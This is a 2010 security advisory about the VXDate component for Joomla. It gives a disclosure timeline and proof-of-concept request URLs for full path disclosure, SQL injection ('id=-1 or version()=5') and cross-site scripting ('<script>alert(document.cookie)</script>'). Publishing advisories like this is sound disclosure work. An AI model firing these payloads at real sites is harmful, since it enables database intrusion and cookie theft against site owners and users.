Joomla Component com_vxdate Multiple Vulnerabilities

2010-03-17
ID: 35443
CVE: None
Download vulnerable application: None
-------------------------------------------------------------------------------------------------------------

I want to warn you about vulnerabilities in component VXDate for Joomla.


-----------------------------

Advisory: Vulnerabilities in VXDate for Joomla

-----------------------------

URL: http://websecurity.com.ua/3849/

-----------------------------

Timeline:



10.05.2009 - found the vulnerabilities.

12.01.2010 - announced at my site.

18.01.2010 - informed developers.

13.03.2010 - disclosed at my site.

-----------------------------

Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.


Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’



SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5


XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.
1-4-2 (www01)